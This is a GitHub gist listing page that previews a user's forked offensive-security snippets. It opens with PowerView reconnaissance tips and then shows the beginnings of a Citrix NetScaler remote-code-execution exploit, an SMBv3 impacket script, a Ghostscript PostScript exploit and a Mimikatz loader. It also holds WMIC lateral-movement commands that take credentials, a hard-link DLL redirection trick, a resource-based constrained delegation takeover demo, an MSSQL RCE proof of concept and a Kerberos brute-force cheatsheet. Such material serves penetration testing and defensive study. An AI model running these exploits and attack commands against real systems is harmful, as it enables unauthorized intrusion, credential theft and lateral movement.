Skip to content

Instantly share code, notes, and snippets.

View Ridter's full-sized avatar
:octocat:
wow

evi1cg Ridter

:octocat:
wow
2.8k followers · 76 following
View GitHub Profile
@Ridter
Ridter / PowerView-3.0-tricks.ps1
Created March 25, 2020 02:28 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@Ridter
Ridter / gist:426e4705775851dafbe5ca166048bf72
Created March 17, 2020 06:29 — forked from asolino/gist:45095268f0893bcf08bca3ae68a755b2
#!/usr/bin/env python
import argparse
import string
import sys
from impacket import nmb
from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \
SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \
SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \
SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \
@Ridter
Ridter / netscaler_exploit.py
Created January 16, 2020 09:09 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@Ridter
Ridter / Update_Notes.md
Created January 14, 2020 12:11
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

@Ridter
Ridter / wmicLateralMovement.txt
Created December 17, 2019 11:51 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
@Ridter
Ridter / exp.ps
Created September 23, 2019 08:45
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
/exploit {
/println { (\\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
@Ridter
Ridter / Tasks.cs
Created August 3, 2019 08:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@Ridter
Ridter / rbcd_demo.ps1
Created June 24, 2019 01:27 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@Ridter
Ridter / bad_sequel.py
Created June 21, 2019 17:53 — forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@Ridter
Ridter / kerberos_attacks_cheatsheet.md
Created June 19, 2019 08:52 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: